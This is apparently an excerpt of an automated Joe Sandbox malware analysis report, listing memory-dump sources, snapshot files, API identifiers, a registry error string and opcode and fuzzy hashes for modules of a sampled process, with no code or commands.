                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c3dff2d061f3e5c9a2bcf6a40d8b53005d9f3c8c448c43403f9d6371be0e5e12
                                    • Instruction ID: 8491c1ef8f177845cfc45918ed46f4f565fad1ea3ccab93b713a0fd66e7d7fc0
                                    • Opcode Fuzzy Hash: c3dff2d061f3e5c9a2bcf6a40d8b53005d9f3c8c448c43403f9d6371be0e5e12
                                    • Instruction Fuzzy Hash: A6F068E271C6CA41F5535B20FC403B56154AF46794F440239DD5D865B0DFBDDD899301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c35669941a7ba86aad468810fa48f2004c76b28f74cf3b2dc9b98ab190aaf282
                                    • Instruction ID: fab0da83c4cc6a0837ac0efdfb7fae7c056d01382b0d71d1d96e0de87cd8f5d3
                                    • Opcode Fuzzy Hash: c35669941a7ba86aad468810fa48f2004c76b28f74cf3b2dc9b98ab190aaf282
                                    • Instruction Fuzzy Hash: 6EF068E271C6C641F5539B20FC403B56154AF46794F480239DD5D866B0DFBDDD899301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: dc1d72c241cb2a582c13a8c20989dd97c94f2eaf65a9d9d8e4de6004fbc356e4
                                    • Instruction ID: fa542073484c319243c50f6a69ce24b5386ec0a8c757811941bf12ced51a1178
                                    • Opcode Fuzzy Hash: dc1d72c241cb2a582c13a8c20989dd97c94f2eaf65a9d9d8e4de6004fbc356e4
                                    • Instruction Fuzzy Hash: 80F0C892E0C68681F6538F20FD413B52154BF46794F080135DD5DCA6A0DFADED89D300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 2f734235ef33e1cf216b788ab3af8fc11556682c22bf506bbb09f642fc0cdf2f
                                    • Instruction ID: ffb08266d48e2e4b950e6f4666e8b7448528af75cff74a54c5a1e4c370842222
                                    • Opcode Fuzzy Hash: 2f734235ef33e1cf216b788ab3af8fc11556682c22bf506bbb09f642fc0cdf2f
                                    • Instruction Fuzzy Hash: 96F0C892E0C68681F5538F20FD413B52154AF46794F440135DD1DCA2A0DFADED49C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 44ad8aaefd962aaa4904b7276fbaa43ed952a9a48d0d7d28a64918699caf23e8
                                    • Instruction ID: 3860dbd1cd2282e1871d6e62cd7273e74a3e60b2e26aa30eb9225327a113e9c4
                                    • Opcode Fuzzy Hash: 44ad8aaefd962aaa4904b7276fbaa43ed952a9a48d0d7d28a64918699caf23e8
                                    • Instruction Fuzzy Hash: 73F04FA2A0C68A41F5578F20FC453796254BF46794F440275DD5DCA6E0DEADDE4D9300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 5f5ea0f9f6c2b9098e89ad5623ce28115323a951ada21aea5d48ca5dd308e646
                                    • Instruction ID: 122cb70f7bbc310ad0d33c5f1c7ea3e2288ff93c47233ee42727bcaa3bfc0efd
                                    • Opcode Fuzzy Hash: 5f5ea0f9f6c2b9098e89ad5623ce28115323a951ada21aea5d48ca5dd308e646
                                    • Instruction Fuzzy Hash: 8CF0AFA2A0C68A41F5578F20FC413796254AF42794F440235DD1DCA2A0EEACDE498300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    APIs
                                      • Part of subcall function 00007FF7AABD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7AABD162F), ref: 00007FF7AABD1FEE
                                    • SleepEx.KERNEL32 ref: 00007FF7AABD1A51
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
